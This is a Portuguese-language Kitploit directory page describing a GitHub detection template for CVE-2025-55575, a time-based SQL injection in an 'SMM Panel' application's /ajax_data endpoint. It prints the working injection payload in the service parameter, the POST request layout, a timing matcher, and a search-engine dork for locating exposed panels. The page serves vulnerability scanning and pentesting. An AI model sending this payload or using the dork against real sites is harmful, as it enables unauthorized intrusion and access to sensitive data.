Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55575 — Modelo de detecção de injeção SQL baseada em tempo para SMM Panel. Envia requisições POST personalizadas para `/ajax_data` e identifica endpoints vulneráveis por meio da análise de atraso na resposta. | Kitploit
Ferramentas/GitHubGitHub/aether-0/cve-2025-55575
Scanners de VulnerabilidadesAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubaether-0/cve-2025-55575

CVE-2025-55575

Modelo de detecção de injeção SQL baseada em tempo para SMM Panel. Envia requisições POST personalizadas para `/ajax_data` e identifica endpoints vulneráveis por meio da análise de atraso na resposta.

Ver Repositório
há 0 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

smm-panel-sqli(CVE-2025-55575)

Detecção de SQL Injection baseada em tempo para SMM Panel


Visão Geral

Este template detecta uma vulnerabilidade de SQL Injection baseada em tempo no parâmetro service_detail do SMM Panel através de requisições HTTP POST para /ajax_data. A exploração pode permitir que atacantes remotos acessem dados sensíveis ou escalem privilégios.

  • Autor: Aether
  • Gravidade: Crítica
  • Tags: sqli, mysql, timing, dork:'intitle:"#1 SMM Panel ****"' "smm panel"
  • Referência: https://owasp.org/www-community/attacks/SQL_Injection

Lógica de Detecção

A ferramenta envia uma requisição POST personalizada:

root@kitploit:~
POST /ajax_data
Content-Type: application/x-www-form-urlencoded

action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z

Se o tempo de resposta for maior que 5 segundos, indica um endpoint vulnerável.

Exemplo de Detecção

root@kitploit:~
- Método: POST
- Caminho: {{BaseURL}}/ajax_data
- Cabeçalhos: Content-Type: application/x-www-form-urlencoded
- Corpo: action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
- Matcher: duração > 5 segundos

Vídeo de Demonstração

SQLi PoC

Baixar ferramenta